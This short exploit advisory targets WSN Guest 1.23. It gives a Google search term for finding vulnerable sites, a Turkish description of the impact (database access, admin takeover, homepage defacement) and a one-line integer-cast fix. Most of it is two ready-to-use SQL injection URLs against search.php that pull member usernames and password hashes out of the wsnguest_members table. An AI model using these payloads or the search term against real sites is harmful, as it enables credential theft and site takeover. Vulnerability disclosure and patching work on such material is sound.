< ------------------- header data start ------------------- >
#############################################################
# Application Name : WSN Guest 1.23
# Vulnerable Type : SQL Injection
# Google Keyword : allinurl:wsnguest
# Infection : Yönetici bilgileride dahil olmak üzere veritabanindaki tüm verilere erisim saglanabilir. Elde edilen Yönetici sifresi ile sisteme giris yapilarak haber vb. içerik eklemek suretiyle ilgili site ana sayfasi yönlendirilerek hack edilebilir.
# Bug Fix Advice : id degiskeni sadece Integer deger alacak sekilde düzenlenmelidir.
Ilgili Güvenlik açiginin kapatilmasi için Örnek Kod: id = Cint(Request.QueryString(id))
# author : Bug Researchers/DaiMon
# Download : http://scripts.webmastersite.net/wsnguest/wsnguest.zip
#############################################################
< ------------------- header data end of ------------------- >
< -- bug code start -- >
username :
[path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/name%20text,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
password :
[path]/search.php?filled=1&action=advanced&whichtype=entries&searchfields[0]=ownerid&search=999/**/union/**/select/**/password,1,2,3,4,5,6,7,8,9,10,11,12,13/**/from/**/wsnguest_members
< -- bug code end of -- >